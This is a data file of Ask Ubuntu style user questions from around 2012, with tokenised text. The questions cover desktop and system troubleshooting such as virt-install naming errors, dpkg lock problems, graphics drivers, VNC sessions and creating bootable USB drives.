160152	virt-install says name is in use , but virsh list -- all is empty . where is virt-install finding this name ?	virt-install says name is in use , but virsh list -- all says there is nothing . jrwren @ delays : { % 22 } ~ $ virt-install -d -n android -r 512 -- disk android.qcow2 -s 4 -c /d/cd\ images/android-x86-2.2-generic.iso -- vnc -- noautoconsole [ thu , 05 jul 2012 16:57:19 virt-install 23170 ] debug ( cli:220 ) launched with command line : /usr/bin/virt-install -d -n android -r 512 -- disk android.qcow2 -s 4 -c /d/cd images/android-x86-2.2-generic.iso -- vnc -- noautoconsole [ thu , 05 jul 2012 16:57:19 virt-install 23170 ] debug ( cli:326 ) requesting libvirt uri default [ thu , 05 jul 2012 16:57:19 virt-install 23170 ] debug ( cli:328 ) received libvirt uri qemu : ///session [ thu , 05 jul 2012 16:57:20 virt-install 23170 ] debug ( virt-install:259 ) requesting virt method 'default ' , hv type 'default ' . [ thu , 05 jul 2012 16:57:20 virt-install 23170 ] debug ( virt-install:469 ) received virt method 'hvm' [ thu , 05 jul 2012 16:57:20 virt-install 23170 ] debug ( virt-install:470 ) hypervisor name is 'kvm' [ thu , 05 jul 2012 16:57:20 virt-install 23170 ] debug ( cli:950 ) -- graphics compat generated : vnc [ thu , 05 jul 2012 16:57:20 virt-install 23170 ] error ( cli:597 ) guest name 'android ' is already in use . ( venv ) jrwren @ delays : { % 22 } ~ $ sudo virsh -c qemu : ///system list -- all id name state -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- where is virt-install finding this name ? edit : i should mention that libvirt_default_uri is not set .
160156	will the `` hibernate '' feature ever be restored ?	from now on , will there never be a `` hibernate '' feature in ubuntu again ( since it was known to contribute to data loss ) , or is the removal of the `` hibernate '' option only a temporary measure until the data loss issues are fixed ? i find that it 's easy to lose data now that the hibernate feature is gone and suspending the os is the only option ; will it be like this forever from 12.04 onward ?
160158	how can i remap my keys to act like the macintosh keyboard ( like hold alt l + l click = r click ) ?	i want my keyboard layout to act like a macintosh keyboard . it 's hard to use my computer after years on a mac . i want to disable my right mouse click , and replace it with alt + right mouse click . the alt key will also act like ctrl . i want my left ctrl to be the hud key . i still want my super key to be the same . can someone please make a script , or point me in the direction of a program to do all this with ease . if you were to make a script/whatever , can you please make one what will reverse all keyboard changes in-case i feel that it is not the same . i will add to the post if i miss anything . thank you .
160160	unity launcher does n't appear in vnc session	i 'd like to have a unity desktop accessible via vnc on a precise server machine i have running . i installed the ubuntu-desktop package . i 'm launching a vnc session with the following in my ~/.vnc/xstartup file : # ! /bin/sh xrdb $ home/.xresources xsetroot -solid grey export xkl_xmodmap_disable=1 gnome-session -- session=ubuntu-2d what could the issue be here ? the content of my /usr/share/gnome-session/sessions/ubuntu-2d.session file ( this is what 12.04 puts there by default ) is : [ gnome session ] name=ubuntu 2d requiredcomponents=gnome-settings-daemon ; requiredproviders=windowmanager ; panel ; shell ; defaultprovider-windowmanager=metacity defaultprovider-panel=unity-2d-panel defaultprovider-shell=unity-2d-shell desktopname=unity i do n't know anything about unity-2d , but i guessed that the default session was not configured to use the launcher . i tried making the following modifications : [ gnome session ] name=ubuntu 2d requiredcomponents=gnome-settings-daemon ; requiredproviders=windowmanager ; panel ; shell ; launcher ; defaultprovider-windowmanager=metacity defaultprovider-panel=unity-2d-panel defaultprovider-shell=unity-2d-shell defaultprovider-launcher=unity-2d-launcher desktopname=unity but i got the following warning in my vnc log file : gnome-session [ 10354 ] : warning : unable to find default provider 'qr ' of required provider 'launcher' and the vnc session would n't even start with that configuration .
160163	external usb hard drive makes noises when the computer is turned off	i have an external usb hard drive of 500gb . i ca n't tell what model it is exactly , as nothing specific is written on it and i do n't have the box anymore . i use it as a backup disk . it works absolutely fine when the computer is turned on : no problems with writing or reading , and everything is done in dead silence . however , if i turn the computer off and the disk is still connected , it stays on and makes clicking noises . for that reason i only connect it when i need to back up or restore . does that mean there 's a problem with the disk , or with some preferences in the system itself ? or something else ? disk utility claims that smart data is `` not supported '' , so i do n't know how to test it .
160164	how do i enable middle mouse button emulation in 12.04 lts ?	how do i enable middle mouse button emulation in 12.04 lts ? i think it was disabled by default in the last release . i 'm sure this is a silly question but i ca n't find a generic answer , they all seem to be touchpad specific ( ie , multi-touch related , which i do n't have ) , or using what i consider not to be normal ubuntu methods ( creating xorg.conf file ) . i 'm using xubuntu variant ( xfce ) on a dell inspiron mini . i was actually just testing there and if i tap with both fingers at once it brings up a context menu ( like right click ) . wired i did n't know this trackpad could even tell that there was a two finger tap ... former behaviour was clicking both touchpad buttons ( they are the built in kind ) at the same time produced a middle clicck . they no longer do this . i never used a double tap , but the actual buttons . to clarify i am using a built in touchpad , not an external mouse . gpointings detects it as synaptic touch , which i believe is correct update- the question @ medigeek linked to below let me set a two fingered tap to emulate a middle click , but i still cant click both buttons at the same time output from synclient is here : leftedge = 1760 rightedge = 5302 topedge = 1639 bottomedge = 4479 fingerlow = 25 fingerhigh = 30 fingerpress = 256 maxtaptime = 180 maxtapmove = 232 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 105 horizscrolldelta = 105 vertedgescroll = 1 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 0 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0378931 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 422 edgemotionusealways = 0 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 26 verthysteresis = 26 clickpad = 1 rightbuttonarealeft = 0 rightbuttonarearight = 0 rightbuttonareatop = 0 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0
160169	12.04 installation started to black screen during boot today	note : most of this question is now irrelevant . update 3 summarizes the problem as it stands . i 've been running 12.04 on my lenovo laptop for one month now ( updated from 11.04 ) , and i have not had any significant problem until today . this morning , when i boot , i pass the grub screen , then i get to the purple loading screen with dots as usual , then for some reason i got to the terminal login , with no gui . startx gives me a black screen . ctrl+f7-f8 did n't help either . it 's similar to : after the update today no graphical interface anymore - 12.04 i followed the instructions at the end , to flush the ati drivers ( which i had installed ) , and fall back to the community drivers . that made me lose the login ! now i just get a black screen after the ubuntu loading screen . i can still access the console through recovery , and i 've gotten into vesa mode once or twice ( not reproducible , for some reason ) . i 've tried various permutations of xorg.conf , without success . xorg -configure fails for now , though i might be able to get it to work . apt-get update/upgrade does n't improve anything either . however , both windows and the 12.04 live cd still work beautifully , and i know that all my data is still there . is there any way that i could somehow take the configuration from the live cd and roll with it ? i know that i could reinstall , but that sucks , frankly , especially given that there 's no straight-forward way of keeping the home ( which , incidentally , is unaccessible from the live cd ) thank you . update : it seems that the fglrx drivers are still active , even after i 've -- purged them . from xorg.0.log : [ 18.235 ] ( ww ) fglrx ( 0 ) : *********************************************************** [ 18.235 ] ( ww ) fglrx ( 0 ) : * dri initialization failed * [ 18.235 ] ( ww ) fglrx ( 0 ) : * kernel module ( fglrx.ko ) may be missing or incompatible * [ 18.235 ] ( ww ) fglrx ( 0 ) : * 2d and 3d acceleration disabled * [ 18.235 ] ( ww ) fglrx ( 0 ) : *********************************************************** [ 18.235 ] fatal server error : [ 18.235 ] addscreen/screeninit failed for driver 0 there 's also a mention of the `` fbdev '' module . what is it ? partially solved : i 've undone the damage from the fglrx purge . i 'm still mystified as to why uninstalling the packages did n't kill fglrx entirely , but i 've now recovered the prompt . the solution to the dri initialization error was to add radeon.modeset=0 to the grub boot options . so i 'm back to being dropped to a prompt without any gui . startx gives me a bunch of messages , though no obvious errors . i have little reason to suspect the video drivers , as they worked fine before today . there is no apparent error message in any of the log files . update : when i startx , i get an error , plymounth command failed mountall : disconnected from plymouth this is all over the internet , but i have not found anything that works for me yet . update 3 : if i press esc during boot , the splash screen ( plymouth ! ) disappears , and i no longer have any error from plymouth . the last error message is : stopping mount filesystems on boot i can then ctrl+alt+f1 to get the tty1 , but startx still does not work . sadly , the internet knows nothing about this error message , and neither do i . help !
160172	laptop with ubuntu 12.04 , connected to television with hdmi-cable wont show any content from pc on televison . nothing happens	i have a laptop with ubuntu 12.04 . i have connected my laptop with my hdmi cable to the television . but unlike in windows 7 , i cant find hdmi as an output anywhere in the settings , neither for video nor audio . xan anyone please tell me step by step how i can do this ? i just want to `` stream '' videos , for example from youtube , from my laptop to my telly . i appreciate all the help that i can get .
160173	how do i export a group of photos from shotwell to a folder ?	i wish to select photos from the default event directories , and move them into a custom event directory like shown in this tutorial . then i want to export the group of photos to a specific folder or usb stick . how do i do this ? or to the same ends , how can i export a tagged group of photos to a target directory ?
160176	ca n't install a 64-bit virtualbox on 64-bit 12.04	i have freshly installed 64 bit win 7 and 12.04 ubuntu dual boot machine ( via a wubi install ) . i verified that wubi installed 64-bit ubuntu 12.04 and i specifically downloaded and installed the 64-bit virtualbox package from this page on the virtualbox website . ubuntu 12.04 lts ( `` precise pangolin '' ) i386 | amd64 ( note : i have a toshiba c655 , with an intel pentium chip inside , there i selected the amd64 as instructed to on the top of the page ) when i run virtualbox , it will only allow me to install and run 32 bit guests ( 32 bit win 7 , to be specific ) . i 'm utterly frustrated at this point . i click on `` amd 64 '' , but apparently it is only installing 32-bit . any help would be greatly appreciated .
160183	should i install ubuntu 32-bit or 64-bit on a dell inspiron mini 1012 netbook ?	my machine is a dell inspiron mini 1012 , it has a 1 gb memory . i have installed ubuntu 11.10 on it , but it works very slow . now i want to install 12.04 and i want to know which configuration is better for my computer according with its memory , 32 bits or64 bits . i only want my computer to work faster . i dont know if this information is enough , if you want more info tell me .
160189	how to use `` quickly run '' and pass command-line arguments ?	i 'm trying to implement command-line arguments in https : //launchpad.net/wakeonplan to use them in static quicklist but i ca n't test them because quickly run does n't pass arguments to the script and bin/wakeonplan ca n't find settings location : ( process:18244 ) : glib-gio-error ** : settings schema 'net.launchpad.wakeonplan ' is not installed p.s . i have n't yet pushed the latest code to the branch because it 's highly experimental .
160190	i 've gotten some errors when i tried to burn it on cd , whats wrong ?	i 've downloaded ubuntu so many times and the iso image wo n't burn properly on cd , it returns me an error . i 've gotten some errors when i tried to burn it on cd , whats wrong ? i 've changed the cd media and the same error still appears . what do i do ?
160191	how can i remove windows and upgrade wubi install to a full install without a cd or usb stick ?	i have windows xp with wubi installed . now i want to remove windows xp and upgrade the wubi install to a full installation . how can i do that without a usb stick or a cd ?
160198	openstack dashboard access after installing w\ maas	i 've installed maas and openstack as guided by https : //wiki.ubuntu.com/serverteam/maas/ and https : //help.ubuntu.com/community/ubuntucloudinfrastructure , however on step 5 it states : if you are using this to deploy openstack on a iaas for testing purposes , the last step is to expose the services that should be made available to outside requests , opening the required firewall ports in the security group . this is obviously not needed when deploying using maas . quite frankly it 's not obvious how this is intended to work - i do n't know how to access the openstack dashboard . i ran these commands : juju expose openstack-dashboard and juju expose nova-cloud-controller per the guide , however juju status openstack-dashboard still does not yield an address for me to go to . i 've tried hitting the ip 's of my ( hardware ) nodes to see if it 's living out there somewhere , but got nowhere .
160201	unity launcher integration and quickly run ... fail	i 'm trying to use the uniy launcher with progress bar.. but it does n't work.. i just followed the first example on http : //www.youtube.com/watch ? v=wqgfsgz1sl4 & list=uuwudcz-q0m4qk7lkk4cevqa & index=4 & feature=plcp and watched the code of the hello-unity ppa ... trying integration in my apps.. and it does n't work . what i did : added from gi.repository import unity ; added self.launcher = unity.launcherentry.get_for_desktop_id ( `` protoborsa.desktop '' ) in the init code of my window application . added launcher.set_property ( `` progress '' , 0.42 ) after my application is displayed added launcher.set_property ( `` progress_visible '' , true ) after my application is displayed and nothing happened after quickly run ... i tried to follow this also.. how do i make the launcher progress bar work with my application ? but it did n't work for me . many thanks .
160202	downloading software within ubuntu	when i go into ubuntu software center and download software it will say download complete but when i search for it on the pc to open it its nowhere to be found , i figured it would go into dash home but its nowhere to be found . how do i fix this problem ?
160214	why does the optirun command shut down my computer ?	i 'm running ubuntu 12.04 64bit on the ivy bridge sony vaio s. i installed bumblebee for nvidia-optimus support . everything seemed to install fine , but if i use a command like : optirun firefox my computer just shuts down . no proper shutdown sequence or anything , just boom . down . any help would be very much appreciated .
160215	how to define multiline long_description in quickly 's setup.py ?	when i try using triple quotes python-mkdebian crashes loudly with apport appearing after quickly package [ -- extras ] and when i just make multiline string in single quotes the latter stops silently .
160216	can i have global menu within the gnome fallback session ?	my default unity session is too heavy to my laptop now ( 4 years old machine ) and it 's constantly hanging . i installed the fallback session to get more responsiveness of the whole system , but now i do n't have a global menu , and by that , i lose some screen space..minimal , but i still want them ... is that a solution for this ?
160219	dpkg stuck downloading font files	i have been reinstalling ubuntu 12.04 . the install from usb works fine , and i could update everything ok , but when i got to re-installing my application software i hit a snag . one of the packages i tried to re-install was ttf-mscorefonts-installer . dpkg stalled during this setup , downloading a font file ( it had tried to download it all night ) . i stopped dpkg , and attempted to re-start downloading something else , but it would not let me . the commands i typed are as follows : bob @ bobstudio : ~ $ sudo rm /var/lib/dpkg/lock this unlocks dpkg , but if i try to do something i get the following message ( eg ) : bob @ bobstudio : ~ $ sudo apt-get install synaptic e : dpgk was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem so , i did just that : bob @ bobstudio : ~ $ sudo dpkg -- configure -a whereupon it started the previously failed download all over again . i went round the loop here a few times and each time after the configure command it re-started the failing download , but then i got this : bob @ bobstudio : ~ $ sudo dpkg -- configure -a setting up update-notifier-common ( 0.119ubuntu8.4 ) ... ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/andale32.exe traceback ( most recent call last ) : file `` /usr/lib/update-notifier/package-data-downloader '' , line 234 , in process_download_requests dest_file = urllib.urlretrieve ( files [ i ] ) [ 0 ] file `` /usr/lib/python2.7/urllib.py '' , line 93 , in urlretrieve return _urlopener.retrieve ( url , filename , reporthook , data ) file `` /usr/lib/python2.7/urllib.py '' , line 239 , in retrieve fp = self.open ( url , data ) file `` /usr/lib/python2.7/urllib.py '' , line 207 , in open return getattr ( self , name ) ( url ) file `` /usr/lib/python2.7/urllib.py '' , line 344 , in open_http h.endheaders ( data ) file `` /usr/lib/python2.7/httplib.py '' , line 954 , in endheaders self._send_output ( message_body ) file `` /usr/lib/python2.7/httplib.py '' , line 814 , in _send_output self.send ( msg ) file `` /usr/lib/python2.7/httplib.py '' , line 776 , in send self.connect ( ) file `` /usr/lib/python2.7/httplib.py '' , line 757 , in connect self.timeout , self.source_address ) file `` /usr/lib/python2.7/socket.py '' , line 553 , in create_connection for res in getaddrinfo ( host , port , 0 , sock_stream ) : ioerror : [ errno socket error ] [ errno -2 ] name or service not known setting up ttf-mscorefonts-installer ( 3.4ubuntu3 ) ... bob @ bobstudio : ~ $ sudo apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ bob @ bobstudio : ~ $ sudo rm /var/lib/dpkg/lock bob @ bobstudio : ~ $ sudo apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ the good news is that , once i sorted out the file locks , this seems to have permanently aborted the setup of the font package , so at least i can do something else with dpkg . that leaves two questions : 1 ) how could i have broken the loop without actually crashing out of dpkg ? 2 ) how can i set up the ttf-mscorefonts-installer package in the future ? is this download really broken , or is it 'just ' a bad internet connection ?
160222	why do i get this error trying to build komparator from source ?	i downloaded komparator source from this page . the install file in the source say the following : unpack komparator4-xxx.tar.bz2 , and open a shell inside this directory mkdir build cd build cmake -dcmake_install_prefix=`kde4-config -- prefix` .. make sudo make install i unpacked the file , make the directory , entered this , but when i have tried to cmake ( sentence nยบ3 ) the terminal print the following errors disabling me to make & install : cmake error at /usr/share/cmake-2.8/modules/findkde4.cmake:98 ( message ) : error : cmake/modules/findkde4internal.cmake not found in /home/lucio/.kde/share/apps ; /usr/share/kde4/apps call stack ( most recent call first ) : cmakelists.txt:2 ( find_package ) cmake warning ( dev ) in cmakelists.txt : no cmake_minimum_required command is present . a line of code such as cmake_minimum_required ( version 2.8 ) should be added at the top of the file . the version specified may be lower if you wish to support older cmake versions for this project . for more information run `` cmake -- help-policy cmp0000 '' . this warning is for project developers . use -wno-dev to suppress it . -- configuring incomplete , errors occurred ! what does this errors mean and how can i fix this ?
160224	how do i implement progressbar in appindicator ?	how do i implement progressbar in appindicator ? is it possible ?
160225	how to add unity quicklist to my application ?	how to add unity quicklist to my application ? is there any quickly command similar to quickly add indicator for it ?
160227	12.04 unity 3d 80 % cpu load with compiz	edit : i have been able to to determine that the problem is not compiz , but is actually xorg . i do n't know why , but by quickly maximizing terminal and taking a screenshot with top running before the problem went away i am able to see xorg takes up 72 % of cpu , with bamfdaemon taking up 18 % , and compiz taking up 14 % . seems the nvidia drivers are to blame , will play more with settings and perhaps do a clean nvidia-current install to try to fix the problem . having a very annoying problem with high cpu usage . running 12.04 with latest drivers and nvidia-current installed . have not had any issues for days , now i have a strange problem . unity 3d runs great most of the time , 1-2 % cpu usage with only transmission running in background . windows open and close smoothly . however , no matter what programs are open , if i minimize all open programs to the unity bar on the left , my cpu jumps to about 80 % and slows down all maximize and minimize effects . mouse movement stays smooth the whole time , but unity becomes unresponsive for up to 30 seconds at times . hitting alt + tab to bring up even a single window fixes the problem . the window i bring back up does n't even have to be maximized to solve the problem . hitting the super button to bring up the dash makes cpu drop back to idle until i close it , then high cpu usage resumes . believe the problem is compiz , but even just having only terminal running `` top '' , i have to minimize it to the tray for the problem to show , so i ca n't see the problem process . i can only tell about the high cpu usage using indicator-sysmonitor . even tried quitting the indicator , but i can still tell very poor performance with all applications when minimized . reset compiz back to defaults , tried going to the post-release update nvidia drivers , played with vsync settings in both the nvidia settings and compiz . even forced refresh rate , but can not solve the problem . the problem does not occur in unity 2d . specs are core 2 duo 2.0ghz , 4gb ddr2 ram , 2x 320 's hdd in raid 0 , and nvidia gtx 260m graphics card .
160229	app submission for showdown	if i submit my app to the arb today , can i make any changes before monday ? . or will the arb consider my app based on the version that was submitted on the submission day ? ie if i make changes will i have to resubmit . obviously if they suggest changes i will have to resubmit . but what if there are no suggestions for change . will they grab the latest versions of apps at the end of the competition time ? thanks
160230	vlc does not play any video or mp3 file , closes when a file is opened	when i run vlc from terminal i get : in the vlc dialog box : your input ca n't be opened : vlc is unable to open the mrl 'file : ///media/ent/movies/the % 20mask.avi ' . check the log for details . in terminal : vlc media player 2.0.1 twoflower ( revision 2.0.1-0-gf432547 ) [ 0x8fe8f8 ] main input error : open of `file/xspf-open : ///home/para/.local/share/vlc/ml.xspf ' failed [ 0x8fe8f8 ] main input error : your input ca n't be opened [ 0x8fe8f8 ] main input error : vlc is unable to open the mrl 'file/xspf-open : ///home/para/.local/share/vlc/ml.xspf ' . check the log for details . [ 0x8f1aa8 ] main interface error : no suitable interface module [ 0x8f9b08 ] main interface error : no suitable interface module [ 0x8be008 ] main libvlc error : option http-user-agent does not exist [ 0x8be008 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0x8f9b08 ] qt4 interface error : unable to load extensions module [ 0x7f5280000b78 ] main input error : open of `file : ///media/ent/movies/the % 20mask.avi ' failed [ 0x8fc718 ] main playlist error : could not export playlist this happens for every file i run with vlc . need help in troubleshooting the problem in vlc , this started when i installed vlc 1.0* by mistake when 2.0.1 was already there so i removed vlc from synaptic package manager and reinstalled it
160233	package information was last updated 59 days ago even though ubuntu is up to date	i 'm using ubuntu 11.10 and in the update manager i have a message that says package information last updated 59 days ago press the check button to check for software updates i do that , but i 'm up to date . i checked other threads with this same problem , and saw i should do sudo apt-get update in a terminal to see which repository is not up to date and when i did , i got this message : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/release then i checked for this repository in software sources but could n't find this specific one . in my /etc/apt/sources.list.d i have only one line : deb http : //archive.canonical.com/ubuntu oneiric partner # added by software-center so now i do n't know what to do more . should i upgrade to 12.04 and will it solve my problem ? i would n't want to upgrade if there is a problem in the last version but i do n't know much about ubuntu so , can anyone help me please ? thank you ! !
160235	how do i block the entire internet except a few 'whitelist sites ' ?	i need some method to block the entire internet other then a few sites on my 'whitelist ' . i am looking for a solution that is not browser specific - so no add-ons/plugin suggestions please . is there any file within the system or some command to run in the terminal that will allow me to do this ?
160236	problems with making a bootable usb drive on a mac	i am following these instructions to create a bootable usb drive for me mac and this is the output i get on step 8. new-host : ~ jason $ sudo dd if=/users/jason/desktop/ubuntu-12.04-desktop-amd64.dmg of=/dev/rdisk1s2 bs=1m dd : /dev/rdisk1s2 : invalid argument 691+1 records in 691+0 records out 724566016 bytes transferred in 164.544659 secs ( 4403461 bytes/sec ) what should i do ?
160238	see what ubuntu1 folders are shared	i have several folders in my ubuntu1 folder that i have shared to various people , and i ca n't remember which folders are shared with which people . is there an easy way to find that information ?
160239	problem with installing ubuntu 12.04 dual boot with windows 7	ok , i´m new to ubuntu , and have been trying it out using wubi , but now i´ve decided to install it on a dual boot configuration alongside my already existing windows 7 installation . so here´s my problem : i have 3 hdd 's , windows 7 being installed on sda , with sdb and sdc only for storage . so i go to the installation process , and click the first option there `` install ubuntu alongside windows 7 '' . then i proceed to the next screen where i´m supposed to allocate drive space for the ubuntu installation . problem is , it only gives me the option to select my sdc drive , which is one of my storage hdd´s . i can´t choose my sda drive , which is where i have windows 7 installed . if i click on the third install option , `` something else '' , all 3 hdd´s are being detected correctly ... anyone can help me with this ? would be very grateful ! thanks a lot . edit** so basically , with just my main 160gb hd plugged in , it let me install on it just fine ; if i connect both that and my 320gb hd , it only allow me to choose the 320gb one ; if i plug all 3 , it only allow me to choose the 500gb one this time . it´s like once there is more than 1 hd connected , it won´t let me install on the one with windows 7 already installed . again , thank you for the help !
160240	sound glitches ( repeats ) momentarily	since upgrading to 12.04 ( 64-bit ) , i 've noticed an issue while watching dvds in vlc - the sound will `` glitch '' - that is , it 'll replay a tiny sample over and over for about a second or so , and then continue playing . it 's the same effect as if you 're listening to something and your machine locks up hard , and it plays the same sound ad nauseum until you cut power . however , in my case , it clears after approximately a second . during this time , the video continues to play uninterrupted . the sound resumes in time with the video ( everything that would have been played during that second is lost - it does n't replay it quickly or get behind ) . advice on debug steps would be greatly appreciated .
160242	switchable laptop graphics issues on ubuntu 12.04 ?	i 'm running ubuntu 12.04 on a lenovo z570 laptop with intel hd 3000 integrated graphics , and a switch to enable the dedicated gt630m graphics card . i 've been having issues in general with my graphics drivers and whatnot . ubuntu 's system settings say that it ca n't detect any graphics driver ( it lists 'unknown ' ) , although the quality graphics including fade effects , unity 3d , etc . tell me that one of the cards must be functioning just fine . my decent unplugged battery life suggests that the dedicated graphics is disabled ( plus i googled a solution that allowed me to force the external card off on boot , sorry but i ca n't remember what i did or where i found it ) . in windows , i can hit a switch to toggle the dedicated graphics on and off , along with an indicator light , but that feature does n't work in ubuntu and the light remains on no matter what . secondly , i 'd like to get the proper drivers installed for maximum performance ( if they matter ) . in an earlier installation of 12.04 , i tried to install the nvidia driver and ended up screwing up my resolution so bad that i just had to reinstall ubuntu . i 'm not even sure if the intel integrated graphics need a driver to function properly . sorry if i 'm being a bit confusing ; this is more of a general issue than a precise question , but if i could get some answers to these questions it would be great : 1 ) is there any way i can detect for certain whether or not the dedicated gt630m is being used ? 2 ) is there any way i can enable the ability to switch between the cards ? 3 ) which driver ( s ) should i install , and how can i go about doing that ? when i tried to install the nvidia driver , i ended up going through a whole bunch of command-line stuff that i really did n't understand just to get the installation to work , then i just smashed enter at all of the installation prompts because i hardly understood any of them .
160244	how can i reset my grub background to default ?	i installed some sort of software ( i think it had to do with gnome ) that changed the splash image behind the grub boot interface from the standard purple background to a somewhat tacky debian splash image . is there any sort of quick set of commands i can enter or file i can delete to change it back to the default background ?
160245	how do i make the google chrome flag `` -- allow-file-access-from-files '' permanent ?	if you want to allow a local file to access a local file in google chrome you go to the terminal and run $ google-chrome -- allow-file-access-from-files
160246	will ubuntu 12.04 64bit run on a intel celeron 900 ?	i have a intel celeron 900 @ 2.20 ghz will it run or does it require a amd 64bit proccesor .
160247	completely eliminating all password prompt	i 've looked all over google for a way to disable those annoying password prompts . so far the only one that 's worked is editing the sudoer file , but then this only disables the password prompt for sudo in the terminal program . i still need to trash the one for su and the one for installing software . another irritant is that this os wo n't allow you to put a simple password , it has to be unmemorizable . i 'd much prefer the possibility of some intruder trashing my setup than having that annoying password prompt constantly pop up - so much so that i resorted to putting a text file on my desktop with the passwords on it , so i can easily retrieve them .
160248	how do i easily resize a wallpaper for my screen ?	i like to use wallpapers from interfacelift but not all the wallpapers are my screens resolution and i was wondering what the best/easiest method would be to resize then to fit onto my resolution . i tried installing the nautilus resize extension but it never showed up and i 've heard abit about phatch , but that it was no longer being developed .
160253	encrypting/decrypting a single file in ubuntu 12.04 lts	i need to be able to encrypt/decrypt a single text file stored on my external hd in 12.04 lts , preferably a gui application , if any , or the command line otherwise . thank you .
160257	adobe flash playing at double speed , studders on firefox , chromium , chrome	this question seems very similar to mine maybe i 'm the first one and perhaps this can serve as a place for everyone to get the fix chromium : 18.0.1025.168 ( developer build 134367 linux ) ubuntu 12.04 64bit flash : 11,2,202,236 installed it studders or it plays double the speed same experience in firefox 13.0.1 also in chrome : 20.0.1132.47 lspci : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 display controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1c.4 pci bridge : intel corporation panther point pci express root port 5 ( rev c4 ) 00:1c.5 pci bridge : intel corporation panther point pci express root port 6 ( rev c4 ) 00:1c.7 pci bridge : intel corporation panther point pci express root port 8 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf110 [ geforce gtx 560 ti ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf110 high definition audio controller ( rev a1 ) 03:00.0 sata controller : asmedia technology inc. asm1062 serial ata controller ( rev 01 ) 04:00.0 ethernet controller : broadcom corporation netlink bcm57781 gigabit ethernet pcie ( rev 10 ) 05:00.0 pci bridge : asmedia technology inc. asm1083/1085 pcie to pci bridge ( rev 01 ) 07:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller
160258	wifi works in vista , but not in ubuntu	i 've xubuntu 12.04 installed on my hp dv-4 laptop , and it was working fine with my previous wifi router - a buffalo air station whr-hp-g54 . i recently replaced the air station with a new netgear wndr-3800 ... basically gigabit ethernet ports , added multi-band 802.11n , etc . everything in the house has been reconnected to the new network - ipods , iphone , kindle fire , macbooks , even this hp dv-4 laptop - when it boots in windows vista 64 . when in xubuntu 12.04 , network manager 'sees ' the network ( s ) , just as before ... but can not connect to them . it just sits there with the icon 'spinning ' until it times out . regular 'wired ' connection works fine ... just ca n't seem to connect to the wifi network ( s ) - any of them . should n't be anything 'special ' required ; none of the other devices needed anything other than the new password to connect . ideas ?
160260	which libraries i need for projects in mono develop to work properly ?	i want to test each and every project type available on mono . but due to some package dependencies im unable to run any of `` hello world '' project . i have less idea what libraries i need for what . few days back i have installed gtk-sharp2 but still while running an vb.net gtk # or c # gtk # im getting compilation errors that cli.gtk does not exist . is there a way through which i can solve all dependencies by one click ? ! i atleast once want to try learning linux app programming . without the proper tools it is not possible . please help : ) mono develop version : 2.8.6.3 ubuntu 12.04 32 bit
160268	why is my `/usr/lib64` directory empty , even after installing adobe flash 64bit	well , i installed adobe flash player 64 bit today and i noticed , it asked me to place something in /usr/lib64 but after installation , it 's empty ! ! everything is in lib not in lib64 , which i do n't understand because i have a 64-bit ubuntu 12.04 lts . can someone help me ? i 'm a bit new to ubuntu and i would like to get this `` lib64 '' and `` lib '' confusion settled because if i 'm running 32-bit programs without knowing it , i 'd love to fix that so maybe everything will run faster . i have 4 gigs of ram .
160270	gtk fonts too large with openbox	i am having a problem with the default font sizes for gtk apps in openbox being too large . i do not quite understand how to fix the issue . they do not follow the settings set from within un or from gnome-tweak-tool
160277	dell inspiron n4050 vga driver	i 'm using ubuntu 11.10 . i do n't have vga driver installed for it . where from i can get it ? laptop : dell inspiron n4050 it has intel hd grphics card .
